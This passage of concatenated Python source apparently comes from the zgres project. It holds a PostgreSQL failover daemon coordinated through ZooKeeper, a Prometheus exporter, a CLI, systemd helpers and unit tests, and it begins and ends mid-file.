{'headers': {b'Content-type': b'application/x-www-form-urlencoded',
b'User-Agent': b'Twisted Wrapper %s' % str(__version__).encode('ascii')},
'method': b'POST',
'postdata': b'key=API+Key&method=Campaign_Find'}))
@defer.inlineCallbacks
def test_api_error(self):
d = self._call_once('API Key', {'code': 221, 'message': 'Key not found', 'result': 'error'}, 'List_Get_Active_Lists')
yield self.failUnlessFailure(d, APIError)
@defer.inlineCallbacks
def test_unicode_api_key(self):
getPage, out = yield self._call_once(u'unicode API Key', [], 'Campaign_Find')
self.assertEquals(getPage.call_args[1]['postdata'], b'key=unicode+API+Key&method=Campaign_Find')
@defer.inlineCallbacks
def test_unicode_argument(self):
getPage, out = yield self._call_once('API Key', [], 'Contact_Get', email=u"[email protected]")
self.assertEquals(_parse_post(getPage.call_args[1]), [('email', '[email protected]'), ('key', 'API Key'), ('method', 'Contact_Get')])
``` |
{
"source": "jinty/zgres",
"score": 2
} |
#### File: zgres/zgres/deadman.py
```python
import sys
import itertools
import time
import uuid
from copy import deepcopy
import asyncio
import logging
import argparse
import zgres.plugin
from zgres.plugin import hookspec
import zgres.config
from zgres import utils
_missing = object()
@hookspec
def initialize():
"""Run any initialization code plugins need. Allways called first.
Return value ignored"""
pass
@hookspec(firstresult=True)
def get_my_id():
"""Get the id of this postgresql cluster"""
pass
@hookspec
def notify_state(state):
"""subscribe to changes in cluster state"""
pass
@hookspec
def notify_conn_info(conn_info):
# subscribe to changes in cluster connection info
pass
@hookspec
def master_lock_changed(owner):
# subscribe to changes in cluster master
pass
@hookspec
def veto_takeover(state):
pass
@hookspec
def veto_takeover(state):
# passed the state just before state is updated in the DCS, return True if we are not willing to takeover. This will result in the "willing" key in the state being None. The veto should only take into account values in the passed state object.
pass
@hookspec(firstresult=True)
def best_replicas(states):
# passed an iterator of the "willing" replicas (i.e. replicas with a non-null "willing" value in the state of sufficient age) and returns an iterator of the "best" replicas for failover
pass
@hookspec
def dcs_set_database_identifier(database_id):
pass
@hookspec(firstresult=True)
def dcs_get_database_identifier():
pass
@hookspec
def dcs_set_timeline(timeline):
pass
@hookspec(firstresult=True)
def dcs_get_timeline():
pass
@hookspec(firstresult=True)
def dcs_lock(name):
"""Get a named lock in the DCS"""
pass
@hookspec
def dcs_unlock(name):
pass
@hookspec(firstresult=True)
def dcs_get_lock_owner(name):
pass
@hookspec
def dcs_watch(master_lock, state, conn_info):
pass
@hookspec
def dcs_set_state(state):
pass
@hookspec(firstresult=True)
def dcs_list_state():
pass
@hookspec
def dcs_delete_conn_info():
pass
@hookspec
def dcs_set_conn_info(conn_info):
pass
@hookspec(firstresult=True)
def dcs_list_conn_info():
pass
@hookspec
def dcs_disconnect():
pass
######### Dealing with the local postgresql cluster
# return a dict with the connection info
@hookspec(firstresult=True)
def pg_connect_info():
pass
@hookspec(firstresult=True)
def pg_get_database_identifier():
pass
@hookspec(firstresult=True)
def pg_get_timeline():
pass
# stop postgresql if it is not already stopped
@hookspec
def pg_stop():
pass
# start postgresql if it is not already running
@hookspec
def pg_start():
pass
@hookspec
def pg_reload():
pass
@hookspec
def pg_restart():
pass
# halt: should prevent the existing database from running again.
# either stop the whole machine, move data directory aside, pg_rewind or prepare for re-bootstrapping as a slave
@hookspec
def pg_reset():
pass
# create a new postgresql database
@hookspec
def pg_initdb():
pass
@hookspec
def pg_stop_replication():
pass
@hookspec
def pg_setup_replication(primary_conninfo):
pass
# create a backup and put it where replicas can get it
@hookspec
def pg_backup():
pass
@hookspec
def pg_restore():
pass
# returns one of: None, 'master', 'replica'
@hookspec(firstresult=True)
def pg_replication_role():
pass
# monitoring
@hookspec
def start_monitoring():
pass
@hookspec
def get_conn_info():
"""extra keys for "conn" information provided by plugins
at least the one plugin must provde this so that application servers can connect
"""
pass
def willing_replicas(states):
for id, state in states:
if state.get('willing', None) is None:
continue
if state['willing'] + 600 < time.time():
yield id, state
def _assert_all_true(item, msg):
if not _is_all_true(item):
raise AssertionError(msg)
def _is_all_true(item):
"""Has at least one result and nothing that is false"""
non_true = [i for i in item if not i]
if not item or non_true:
return False
return True
class App:
_giveup_lock = asyncio.Lock()
my_id = None
config = None
database_identifier = None
tick_time = None
_exit_code = 0
_master_lock_owner = None
def __init__(self, config):
self.health_problems = {}
self._state = {}
self.config = config
self.tick_time = config['deadman'].get('tick_time', 2) # float seconds to scale all timeouts
self._conn_info = {} # TODO: populate from config file
self._setup_plugins()
self.logger = logging.getLogger('zgres')
@property
def replication_role(self):
return self._state.get('replication_role', None)
@property
def have_master_lock(self):
return self._master_lock_owner == self.my_id
def _setup_plugins(self):
self._pm = zgres.plugin.setup_plugins(
self.config,
'deadman',
sys.modules[__name__],
self)
self._plugins = self._pm.hook
def follow(self, primary_conninfo):
# Change who we are replicating from
self.logger.info('Now replicating from {}'.format(primary_conninfo))
assert self._plugins.pg_replication_role() != 'master'
self._plugins.pg_setup_replication(primary_conninfo=primary_conninfo)
self._plugins.pg_restart()
def replica_bootstrap(self):
self._plugins.pg_stop()
# some restore methods only restore data, not config files, so let's init first
self._plugins.pg_initdb()
try:
self._plugins.pg_restore()
except Exception:
# try make sure we don't restore a master by mistake
self._plugins.pg_reset()
raise
self._plugins.pg_setup_replication(primary_conninfo=None)
my_database_id = self._plugins.pg_get_database_identifier()
if self._plugins.pg_replication_role() != 'replica' or my_database_id != self.database_identifier:
# destroy our current cluster
self._plugins.pg_reset()
self.logger.error("Something is seriously wrong: after restoring postgresql was NOT setup as a replica.")
return 5
return 0
def master_bootstrap(self):
# Bootstrap the master, make sure that the master can be
# backed up and started before we set the database id
self.logger.info('Initializing master DB')
self._plugins.pg_initdb()
self._plugins.pg_start()
database_id = self._plugins.pg_get_database_identifier()
self.logger.info('Initializing done, master database identifier: {}'.format(database_id))
if self._plugins.dcs_lock(name='database_identifier'):
self.logger.info('Got database identifer lock')
if self._plugins.dcs_get_database_identifier() is not None:
self.logger.info('Database identifier already set, restarting to become replica')
return 0
self.logger.info('No database identifer yet, performing first backup')
self.database_identifier = database_id
self._plugins.pg_backup()
r = self._plugins.dcs_set_database_identifier(database_id=database_id)
_assert_all_true(r, 'Something is VERY badly wrong.... this should never happen....')
self.logger.info('Successfully bootstrapped master and set database identifier: {}'.format(database_id))
return 0
self.logger.info('Could not set database identifier in DCS. maybe another master beat us? trying again')
return 5
def initialize(self):
"""Initialize the application
returns None if initialzation was successful
or a number of seconds to wait before trying again to initialize
"""
self.unhealthy('zgres.initialize', 'Initializing')
self.logger.info('Initializing plugins')
self._plugins.initialize()
self.my_id = self._plugins.get_my_id()
self.logger.info('My ID is: {}'.format(self.my_id))
self.database_identifier = self._plugins.dcs_get_database_identifier()
if self.database_identifier is None:
self.logger.info('Could not find database identifier in DCS, bootstrapping master')
return self.master_bootstrap()
self.logger.info('Found database identifier in DCS: {}'.format(self.database_identifier))
my_database_id = self._plugins.pg_get_database_identifier()
if my_database_id != self.database_identifier:
self.logger.info('My database identifer is different ({}), bootstrapping as replica'.format(my_database_id))
return self.replica_bootstrap()
replication_role = self._plugins.pg_replication_role()
self.update_state(replication_role=replication_role)
if replication_role is None:
raise AssertionError('I should have a replication role already')
elif replication_role == 'replica':
self.logger.info('I am a replica, registering myself as such')
elif replication_role == 'master':
self.logger.info('I am NOT a replica, trying to take over as master')
if self._plugins.dcs_lock(name='master'):
self.logger.info('Got master lock, proceeding with startup')
else:
owner = self._plugins.dcs_get_lock_owner(name='master')
self.logger.info('Failed to get master lock ({} has it), checking if a new master is running yet'.format(owner))
self._plugins.pg_stop()
# XXX this is NOT true if our master was recovering while the other master started up
# hmm, wonder how we can do it properly? connect to the new master? firewalls?
# what state can we inspect?
my_timeline = self._plugins.pg_get_timeline()
existing_timeline = self._plugins.dcs_get_timeline()
if existing_timeline > my_timeline:
self.logger.info("a master has started while we didn't have the lock, resetting ourselves")
# we can't start again for risk of split brain
self._plugins.pg_reset()
else:
self.logger.info('I could not get the master lock, but the master has not started up yet. (new master not functioning?) will try again in a bit')
return 5
self.logger.info('Making sure postgresql is running')
self._plugins.pg_start()
self.logger.info('Starting monitors')
self._plugins.start_monitoring()
self.logger.info('Starting to watch the DCS for events')
self._plugins.dcs_watch(
master_lock=self.master_lock_changed,
state=self._notify_state,
conn_info=self._notify_conn_info)
self._get_conn_info_from_plugins()
self.healthy('zgres.initialize')
if self.health_problems:
if replication_role == 'master':
# I am an unhealthy master with the lock,
# This is a wierd situation becase another master should have taken over before
# we restarted and got the lock. let's check in a little while if we become healthy,
# else try failover again
loop = asyncio.get_event_loop()
loop.call_later(300 * self.tick_time, loop.create_task, self._handle_unhealthy_master())
return None
def _get_conn_info_from_plugins(self):
sources = dict((k, None) for k in self._conn_info)
for info in self._plugins.get_conn_info():
for k, v in info.items():
source = sources.get(k, _missing)
if source is None:
self.logger.info('plugin overriding connection info for {} set in config file, set to: {}'.format(k, v))
elif source is not _missing:
self.logger.info('plugin overriding connection info for {} set by another plugin ({}), set to: {}'.format(k, source, v))
sources[k] = 'plugin_name'
self._conn_info[k] = v
self._state.update(deepcopy(self._conn_info))
def update_state(self, **kw):
changed = False
for k, v in kw.items():
if k in ['willing']:
self.logger.warn('Cannot set state for {}={}, key {} is automatically set'.format(k, v, k))
continue
if k in self._conn_info:
self.logger.warn('Cannot set state for {}={}, key {} has already been set in the connection info'.format(k, v, k))
continue
v = deepcopy(v) # for reliable change detection on mutable args
existing = self._state.get(k, _missing)
if v != existing:
changed = True
self._state[k] = v
if changed:
changed = self._update_auto_state() or changed
if changed and 'zgres.initialize' not in self.health_problems:
# don't update state in the DCS till we are finished updating
self._plugins.dcs_set_state(state=self._state.copy())
def _update_auto_state(self):
"""Update any keys in state which the deadman App itself calculates"""
state = self._state
willing = True
changed = False
if state.get('health_problems', True):
willing = False
if state.get('replication_role', None) != 'replica':
willing = False
if willing:
for vetoed in self._plugins.veto_takeover(state=deepcopy(self._state)):
if vetoed:
willing = False
if willing and state.get('willing', None) is None:
state['willing'] = time.time()
changed = True
elif not willing and state.get('willing', None) is not None:
state['willing'] = None
changed = True
return changed
def _update_timeline(self):
my_timeline = self._plugins.pg_get_timeline()
self._plugins.dcs_set_timeline(timeline=my_timeline)
def master_lock_changed(self, owner):
"""Respond to a change in the master lock.
At least one plugin must call this callback when the master lock
changes. This method should also be called at least once on startup
with the current master.
"""
self._master_lock_owner = owner
if owner == self.my_id:
# I have the master lock, if I am replicating, stop.
if self._plugins.pg_replication_role() == 'replica':
self.update_state(replication_role='taking-over')
self._plugins.pg_stop_replication()
new_role = self._plugins.pg_replication_role()
if new_role != 'master':
raise Exception('I should have become a master already!')
self._update_timeline()
self.update_state(replication_role=new_role)
else:
if self._plugins.pg_replication_role() == 'master':
# if I am master, but I am not replicating, shut down
self.restart(10)
if owner is None:
# No-one has the master lock, try take over
loop = asyncio.get_event_loop()
loop.call_soon(loop.create_task, self._try_takeover())
self._plugins.master_lock_changed(owner=owner)
def _notify_state(self, state):
self._plugins.notify_state(state=state)
def _notify_conn_info(self, conn_info):
self._plugins.notify_conn_info(conn_info=conn_info)
def _willing_replicas(self):
return willing_replicas(self._plugins.dcs_list_state())
def _am_i_best_replica(self):
# Check how I am doing compared to my brethern
better = []
willing_replicas = list(self._willing_replicas()) # list() for easer testing
for id, state in self._plugins.best_replicas(states=willing_replicas):
if id == self.my_id:
return True
better.append((id, state))
self.logger.info('Abstaining from leader election as I am not among the best replicas: {}'.format(better))
return False
async def _async_sleep(self, delay):
await asyncio.sleep(delay * self.tick_time)
def _sleep(self, delay):
# blocking sleep
time.sleep(delay * self.tick_time)
async def _try_takeover(self):
while True:
self.logger.info('Sleeping a little to allow state to be updated in the DCS before trying to take over')
await self._async_sleep(3) # let replicas update their state
# The master is still missing and we should decide if we must take over
if self._master_lock_owner is not None:
self.logger.info('There is a new master: {}, stop trying to take over'.format(self._master_lock_owner))
break
if self._am_i_best_replica():
# try get the master lock, if this suceeds, master_lock_change will be called again
# and will bring us out of replication
self.logger.info('I am one of the best, trying to get the master lock')
if not self._plugins.dcs_lock(name='master'):
continue
else:
self.logger.info('I am not yet the best replica, giving the others a chance')
def unhealthy(self, key, reason, can_be_replica=False):
"""Plugins call this if they want to declare the instance unhealthy.
If an instance is unhealthy, but can continue to serve as a replica, set can_be_replica=True
"""
self.health_problems[key] = dict(reason=reason, can_be_replica=can_be_replica)
self.update_state(health_problems=self.health_problems)
if 'zgres.initialize' in self.health_problems:
return
self.logger.warn('I am unhelthy: ({}) {}'.format(key, reason))
if self._plugins.pg_replication_role() == 'replica':
if not can_be_replica:
self._plugins.dcs_delete_conn_info()
else:
self._plugins.dcs_delete_conn_info()
loop = asyncio.get_event_loop()
loop.call_soon(loop.create_task, self._handle_unhealthy_master())
async def _handle_unhealthy_master(self):
if self._giveup_lock.locked():
return # already trying
async with self._giveup_lock:
while self.health_problems:
for i in self._willing_replicas():
# there is at least one willing replica
# give it a chance to take over by giving up
# the lock
self.restart(120)
await self._async_sleep(30)
def healthy(self, key):
"""Plugins call this if they want to declare the instance unhealthy"""
reason = self.health_problems.pop(key, _missing)
if reason is _missing:
return # no-op, we were already healthy
self.update_state(health_problems=self.health_problems)
self.logger.warn('Stopped being unhealthy for this reason: ({}) {}'.format(key, reason))
if self.health_problems:
self.logger.warn('I am still unhelthy for these reasons: {}'.format(self.health_problems))
else:
# YAY, we're healthy again
if self._plugins.pg_replication_role() == 'master':
locked = self._plugins.dcs_lock(name='master')
if not locked:
# for some reason we cannot lock the master, restart and try again
self.restart(60) # give the
self._set_conn_info()
def _set_conn_info(self):
self._plugins.dcs_set_conn_info(conn_info=self._conn_info)
def run(self):
loop = asyncio.get_event_loop()
self.logger.info('Starting')
timeout = self.initialize()
if timeout is not None:
self.restart(timeout)
# Finished initialziation without issue, startup event loop
loop.set_exception_handler(self._handle_exception)
loop.run_forever()
return self._exit_code
def _handle_exception(self, loop, context):
loop.default_exception_handler(context)
self.logger.error('Unexpected exception, exiting...')
self._exit_code = 1
loop.call_soon(self.restart, 10)
def _stop(self):
# for testing
loop = asyncio.get_event_loop()
loop.stop()
def restart(self, timeout):
self.logger.warn('Shutting Down')
# If we are master, our priority is to stop
# postgresql to avoid a split brain
if self._plugins.pg_replication_role() == 'master':
self.logger.warn('We are master, stopping PostgreSQL')
self._plugins.pg_stop()
# we tell asyncio to stop here so even if the following code errors,
# we will still terminate the process but we do want to be sure
# that postgres is stopped on master before we do that
self.logger.warn('Telling asyncio to stop')
self._stop()
# TODO: deal with very long timeouts/hangs in the following code here
# perhaps spawn a thread to kill -9 ourselves?
# now we try clean up gracefully
self.logger.warn('disconnecting DCS')
self._plugins.dcs_disconnect()
if timeout:
self.logger.warn('sleeping for {} ticks, then restarting'.format(timeout))
self._sleep(timeout) # yes, this blocks everything. that's the point of it!
self.logger.warn('Finished Shut Down')
def pg_connect_info(self):
# expose pg_connect for other plugins to use
return self._plugins.pg_connect_info()
#
# Command Line Scripts
#
def deadman_cli(argv=sys.argv):
parser = argparse.ArgumentParser(description="""Monitors/controls the local postgresql installation.
This daemon will do these things:
- Register the local postgresql instance with Zookeeper by creating a file
named the IP address to connect on.
- Try to become master by creating the file:
master-{cluster_name}
in zookeeper. If we suceed we create the file /tmp/zgres_become_master.
- Shutdown postgres temporarily if we are master and the zookeeper connection is lost.
- Shutdown postgres permanently if master-{cluster_name} already exists and we didn't create it
(split-brain avoidance)
- Monitor the local postgresql installation, if it becomes unavailable,
withdraw our zookeeper registrations.
It does not:
- maintain streaming replication (use zgres-apply hooks for that)
- do remastering (assumed to have happened before we start)
""")
config = zgres.config.parse_args(parser, argv, config_file='deadman.ini')
if 'connection_string' not in config['zookeeper']:
print('EXITING in 60 seconds: must configure zgres-deadman with a zookeeper connection string to start')
time.sleep(60)
sys.exit(0)
app = App(config)
sys.exit(app.run())
```
#### File: zgres/zgres/prometheus.py
```python
import sys
import logging
import argparse
from time import sleep
from prometheus_client import Gauge, start_http_server
from .config import parse_args
from .deadman import App, willing_replicas
metric_dcs_has_conn_info = Gauge('zgres_dcs_has_conn_info', '1 if the server is "connectable" i.e. has conn_info in the DCS, else 0')
metric_dcs_is_willing_replica = Gauge('zgres_is_willing_replica', '1 if the server is "willing_to_take_over" from the master, else 0')
metric_dcs_is_master = Gauge('zgres_is_master', '1 if the server is the current master, else 0')
metric_dcs_willing_since = Gauge('zgres_willing_since', 'Timestamp since which this server has been willing to take over')
def deadman_exporter(argv=sys.argv):
"""This daemon monitors the local zgres-deadman daemon running on this machine.
It works by using the deadman configuration to look into the DCS to find
statistics for this machine. We build it as a separate daemon to lessen the
risk that monitoring and statistics collection inside the zgres-deadman
will cause errors.
We run it on the same machine as this provides:
* reusability of the existing deadman configuration
* easier prometheus configuration
* automatic HA
"""
parser = argparse.ArgumentParser(description="Prometheus statistics daemon for zgres-deadman")
config = parse_args(parser, argv, config_file='deadman.ini')
# this sleep prevents us from restarting too fast and systemd failing to restart us
# we use a fail-always architecture here, any exception causes a daemon restart
sleep(10)
start_http_server(9163)
# use only one plugin and zookeeper connection, otherwise we get memory leaks :(
plugins = App(config)._plugins
plugins.initialize()
while True:
dcs_has_conn_info = 0
dcs_is_willing_replica = 0
# HACK, we only need the plugins, really
all_state = list(plugins.dcs_list_state())
my_id = plugins.get_my_id()
for id, state in all_state:
if id == my_id:
if 'master' == state.get('replication_role'):
metric_dcs_is_master.set(1)
else:
metric_dcs_is_master.set(0)
break
for id, state in willing_replicas(all_state):
if id == my_id:
dcs_is_willing_replica = 1
metric_dcs_willing_since.set(state['willing'])
break
for id, conn_info in plugins.dcs_list_conn_info():
if id == my_id:
dcs_has_conn_info = 1
break
metric_dcs_has_conn_info.set(dcs_has_conn_info)
metric_dcs_is_willing_replica.set(dcs_is_willing_replica)
sleep(60)
if __name__ == '__main__':
deadman_exporter()
```
#### File: zgres/zgres/show.py
```python
import sys
import argparse
from pprint import pformat, pprint
from .config import parse_args
from .deadman import App, willing_replicas
def indented_pprint(obj):
lines = []
for line in pformat(obj).splitlines(True):
lines.append(' ')
lines.append(line)
print(''.join(lines))
def show_cli(argv=sys.argv):
parser = argparse.ArgumentParser(description="Show zgres info")
config = parse_args(parser, argv, config_file='deadman.ini')
if config.has_section('deadman') and config['deadman'].get('plugins', '').strip():
plugins = App(config)._plugins
plugins.initialize()
all_state = list(plugins.dcs_list_state())
my_id = plugins.get_my_id()
my_state = None
for id, state in all_state:
if id == my_id:
my_state = state
break
# if deadman is configured show information about it's state
# HACK, we only need the plugins, really
print('My State:')
print(' ID: {}'.format(my_id))
if my_state is None:
role = 'not registered in zookeeper'
else:
role = my_state.get('replication_role')
print(' Replication role: {}'.format(role))
print('Cluster:')
print(' current master: {}'.format(plugins.dcs_get_lock_owner(name='master')))
print(' database identifier: {}'.format(plugins.dcs_get_database_identifier()))
print(' timeline: {}'.format(pformat(plugins.dcs_get_timeline())))
# willing_replicas is removed!
willing = list(willing_replicas(all_state))
print('\nwilling replicas:')
indented_pprint(willing)
best_replicas = list(plugins.best_replicas(states=willing))
print('\nbest replicas:')
indented_pprint(best_replicas)
print('\nall conn info:')
indented_pprint(list(plugins.dcs_list_conn_info()))
print('\nall state:')
indented_pprint(all_state)
```
#### File: zgres/zgres/systemd.py
```python
import os
from subprocess import check_call, call
def write_service(service_name, contents):
"""Write a service file in a "safe" manner.
If the contents of the file are the same as what is desired to be written,
do nothing.
First writes to a temporary file in the same directory as the target, them
move that temporary file into plce.
Return a boolean True if the file was changed else False
"""
assert '/' not in service_name
path = '/lib/systemd/system/' + service_name
if os.path.exists(path):
with open(path, 'r') as f:
existing = f.read()
if existing == contents:
return False
tmppath = '/lib/systemd/system/.' + service_name + '.tmp'
with open(tmppath, 'w') as f:
f.write(contents)
os.rename(tmppath, path)
return True
def assert_enabled_and_running(service_name, reload=False, reload_daemon=False, restart=False):
check_call(['systemctl', 'enable', service_name])
if reload_daemon:
check_call(['systemctl', 'daemon-reload'])
check_call(['systemctl', 'start', service_name]) # do we need to check status?
if reload:
check_call(['systemctl', 'reload', service_name]) # maybe avoid if we just started the service
if restart:
check_call(['systemctl', 'restart', service_name]) # maybe avoid if we just started the service
def assert_disabled_and_stopped(service_name):
check_call(['systemctl', 'disable', service_name])
call(['systemctl', 'stop', service_name]) # fails if service does not exist
```
#### File: zgres/tests/test_apply.py
```python
import os
import tempfile
import shutil
from unittest import TestCase, mock
_marker = object()
class Test_main(TestCase):
def setUp(self):
self.tmpdir = tempfile.mkdtemp()
self.hooks = os.path.join(self.tmpdir, 'hooks')
os.makedirs(self.hooks)
self.config = os.path.join(self.tmpdir, 'config')
os.makedirs(self.config)
self._run_one_hook_patcher = mock.patch('zgres.apply._run_one_hook')
self.run_one_hook = self._run_one_hook_patcher.start()
self.hook_results = []
self.run_one_hook.side_effect = self.pop_hook_result
def pop_hook_result(self, hook, path):
res = self.hook_results.pop(0)
if isinstance(res, Exception):
raise res
return res
def tearDown(self):
assert not self.hook_results
self._run_one_hook_patcher.stop()
shutil.rmtree(self.tmpdir)
def apply(self):
from zgres.apply import _apply
return _apply(self.tmpdir)
def make_hook(self, filename='10-myhook', for_config='config.json', executable=True):
file = os.path.join(self.hooks, filename)
assert not os.path.exists(file)
with open(file, 'w') as f:
f.write('ignored, use mock to simulate running this file')
if executable:
os.chmod(file, 0o700)
return file
def make_config(self, filename='config.json', data='{"MyKey": "MyValue"}'):
file = os.path.join(self.config, filename)
with open(file, 'w') as f:
f.write(data)
return file
def test_apply(self):
self.make_config()
retcode = self.apply()
self.assertEqual(retcode, 0)
def test_config(self):
from zgres.apply import Config
self.make_config(filename='myconfig.json', data='{"MyKey": "MyValue"}')
proxy = Config(self.config)
self.assertEqual(proxy.get('somename'), None)
self.assertEqual(proxy['myconfig.json'], {"MyKey": "MyValue"})
def test_a_hook(self):
config = self.make_config()
hookfile = self.make_hook()
self.hook_results.append(0)
self.apply()
self.run_one_hook.assert_called_once_with(hookfile, self.config)
def test_ignore_hidden_hook(self):
config = self.make_config()
hookfile = self.make_hook()
hidden_hook = self.make_hook(filename='.myhook')
self.hook_results.append(0)
self.apply()
self.run_one_hook.assert_called_once_with(hookfile, self.config)
def test_a_hook_order(self):
config = self.make_config()
hook1 = self.make_hook(filename='1hook')
hook3 = self.make_hook(filename='3hook')
hook2 = self.make_hook(filename='2hook')
hook10 = self.make_hook(filename='10hook')
self.hook_results.extend([0, 0, 0, 0])
self.apply()
self.assertEqual(
self.run_one_hook.call_args_list,
[mock.call(hook10, self.config),
mock.call(hook1, self.config),
mock.call(hook2, self.config),
mock.call(hook3, self.config),
])
def test_hook_failure(self):
config = self.make_config()
hook1 = self.make_hook(filename='1hook')
hook2 = self.make_hook(filename='2hook')
hook3 = self.make_hook(filename='3hook')
self.hook_results.extend([0, 1, 0]) # second hook fails
# the process must return a non-zero exit code
self.assertEqual(self.apply(), 1)
# and only the first 2 hooks were run
self.assertEqual(
self.run_one_hook.call_args_list,
[mock.call(hook1, self.config),
mock.call(hook2, self.config),
mock.call(hook3, self.config),
])
def test_non_executable_hook(self):
config = self.make_config()
hook1 = self.make_hook(filename='1hook')
hook2 = self.make_hook(filename='2hook', executable=False)
hook3 = self.make_hook(filename='3hook')
self.hook_results.extend([0, 0])
self.apply()
# 2hook is skipped
self.assertEqual(
self.run_one_hook.call_args_list,
[mock.call(hook1, self.config),
mock.call(hook3, self.config),
])
```
#### File: zgres/tests/test_deadman_integration.py
```python
from configparser import ConfigParser
from unittest import mock
import json
import asyncio
import pytest
from zake.fake_client import FakeClient
from kazoo.client import KazooState
from zgres import deadman
from . import FakeSleeper
@pytest.mark.asyncio
async def test_functional():
"""Test as much of the whole stack as we can."""
config = {'deadman': {
'plugins': 'zgres#zookeeper\nzgres#apt\nzgres#ec2-snapshot\nzgres#ec2\nzgres#follow-the-leader\nzgres#select-furthest-ahead-replica',
},
'apt': {
'postgresql_cluster_name': 'main',
'postgresql_version': '9.5',
},
}
zk = FakeClient()
with mock.patch('zgres.zookeeper.KazooClient') as KazooClient, \
mock.patch('zgres.ec2.boto.utils.get_instance_metadata'):
KazooClient.return_value = zk
app = deadman.App(config)
```
#### File: zgres/tests/test_deadman.py
```python
from unittest.mock import call, patch, Mock
import asyncio
import pytest
from . import FakeSleeper
from . import deadman_app
from . import mock_plugin
def fake_best_replicas(replicas):
l = sorted(replicas, key=lambda x: x[1]['willing'])
if l:
winner = l[0][1]['willing']
l = [i for i in l if winner == i[1]['willing']]
for id, state in l:
yield id, state
def mock_state(replica=False, **kw):
if replica:
defaults = dict(
health_problems={},
replica=replica,
pg_last_xlog_replay_location='68A/16E1DA8',
pg_last_xlog_receive_location='68A/16E1DA8')
else:
defaults = dict(
health_problems={},
replica=replica,
pg_current_xlog_location='68A/16E1DA8')
defaults.update(kw)
return defaults
@pytest.fixture
def app(deadman_app):
return deadman_app(dict(deadman=dict(tick_time=1)))
NO_SUBSCRIBER = object()
def state_getter(app, *extra_states):
def dcs_list_state():
# generate some mock state
for id, state in [(app.my_id, app._state)] + list(extra_states):
yield id, state
return dcs_list_state
def setup_plugins(app, **kw):
plugin = mock_plugin(app._pm)
plugin.best_replicas.side_effect = fake_best_replicas
get_my_id = kw.get('get_my_id', '42')
pg_replication_role = kw.get('pg_replication_role', 'replica')
defaults = {
'pg_replication_role': pg_replication_role,
'pg_get_timeline': 1,
'dcs_get_timeline': 1,
'get_conn_info': dict(host='127.0.0.1'),
'get_my_id': get_my_id,
'dcs_set_database_identifier': True,
'dcs_get_database_identifier': '12345',
'pg_get_database_identifier': '12345',
}
if pg_replication_role == 'master':
defaults['dcs_lock'] = True
defaults.update(kw)
for k, v in defaults.items():
func = getattr(plugin, k)
func.return_value = v
return plugin
def test_master_bootstrap(app):
plugins = setup_plugins(app,
dcs_get_database_identifier=None,
dcs_lock=True,
pg_get_database_identifier='42')
timeout = app.initialize()
assert plugins.mock_calls == [
call.initialize(),
call.get_my_id(),
# check if we have a db identifier set
call.dcs_get_database_identifier(),
# no, ok, init our db
call.pg_initdb(),
# make sure it starts
call.pg_start(),
call.pg_get_database_identifier(),
# lock the database identifier so no-one else gets here
call.dcs_lock('database_identifier'),
# while locked make sure there is no id set in the DCS before we got the lock
call.dcs_get_database_identifier(),
# Make the first backup while locked with no DCS
call.pg_backup(),
# set the database identifier AFTER
call.dcs_set_database_identifier('42')
]
# shut down cleanly and immediately
assert timeout == 0
def test_master_boostrap_fails_to_lock_db_id(app):
plugins = setup_plugins(app,
dcs_get_database_identifier=None,
dcs_lock=False,
pg_get_database_identifier='42')
timeout = app.initialize()
assert plugins.mock_calls == [
call.initialize(),
call.get_my_id(),
# check if we have a db identifier set
call.dcs_get_database_identifier(),
# no, ok, init our db
call.pg_initdb(),
# make sure it starts
call.pg_start(),
call.pg_get_database_identifier(),
# lock the database identifier so no-one else gets here
call.dcs_lock('database_identifier')
]
# shut down cleanly
assert timeout == 5
def test_replica_bootstrap(app):
plugins = setup_plugins(app,
dcs_get_database_identifier='1234')
plugins.pg_get_database_identifier.side_effect = ['42', '1234']
timeout = app.initialize()
assert plugins.mock_calls == [
call.initialize(),
call.get_my_id(),
# compare our id with the id in the DCS
call.dcs_get_database_identifier(),
call.pg_get_database_identifier(),
# make sure postgresql is stopped
call.pg_stop(),
# postgresql restore
call.pg_initdb(),
call.pg_restore(),
call.pg_setup_replication(None),
call.pg_get_database_identifier(),
call.pg_replication_role()
]
# shut down cleanly and immediately
assert timeout == 0
def test_replica_bootstrap_fails_sanity_test(app):
plugins = setup_plugins(app,
pg_replication_role='master',
dcs_get_database_identifier='1234',
pg_get_database_identifier='42')
timeout = app.initialize()
assert plugins.mock_calls == [
call.initialize(),
call.get_my_id(),
# compare our id with the id in the DCS
call.dcs_get_database_identifier(),
call.pg_get_database_identifier(),
# make sure postgresql is stopped
call.pg_stop(),
# postgresql restore
call.pg_initdb(),
call.pg_restore(),
call.pg_setup_replication(None),
call.pg_get_database_identifier(),
call.pg_replication_role(),
call.pg_reset(),
]
# shut down after 5 seconds to try again
assert timeout == 5
@pytest.mark.asyncio
async def test_master_start(app):
plugins = setup_plugins(app,
dcs_get_database_identifier='1234',
dcs_lock=True,
pg_replication_role='master',
pg_get_database_identifier='1234')
def start_monitoring():
app.unhealthy('test_monitor', 'Waiting for first check')
plugins.start_monitoring.side_effect = start_monitoring
# sync startup
timeout = app.initialize()
assert plugins.mock_calls == [
call.initialize(),
call.get_my_id(),
# compare our id with the id in the DCS
call.dcs_get_database_identifier(),
call.pg_get_database_identifier(),
# check if I am a replica
call.pg_replication_role(),
# no, so check if there is a master
call.dcs_lock('master'),
# no master, so sure the DB is running
call.pg_start(),
# start monitoring
call.start_monitoring(),
call.dcs_watch(
app.master_lock_changed,
app._notify_state,
app._notify_conn_info,
),
call.get_conn_info(),
# set our first state
call.dcs_set_state({
'host': '127.0.0.1',
'replication_role': 'master',
'health_problems': {'test_monitor':
{'can_be_replica': False, 'reason': 'Waiting for first check'}}})
]
# Carry on running afterwards
assert timeout == None
assert app.health_problems == {'test_monitor': {'can_be_replica': False, 'reason': 'Waiting for first check'}}
# Our test monitor becomes healthy
plugins.reset_mock()
app.healthy('test_monitor')
assert plugins.mock_calls == [
call.dcs_set_state({
'host': '127.0.0.1',
'replication_role': 'master',
'health_problems': {}}),
call.pg_replication_role(),
call.dcs_lock('master'),
call.dcs_set_conn_info({'host': '127.0.0.1'}),
]
def test_failed_over_master_start(app):
# A master has failed over and restarted, another master has sucessfully advanced
plugins = setup_plugins(app,
dcs_lock=False,
dcs_get_timeline=2,
pg_get_timeline=1,
pg_replication_role='master')
# sync startup
timeout = app.initialize()
assert plugins.mock_calls == [
call.initialize(),
call.get_my_id(),
# compare our id with the id in the DCS
call.dcs_get_database_identifier(),
call.pg_get_database_identifier(),
# check if I am a replica
call.pg_replication_role(),
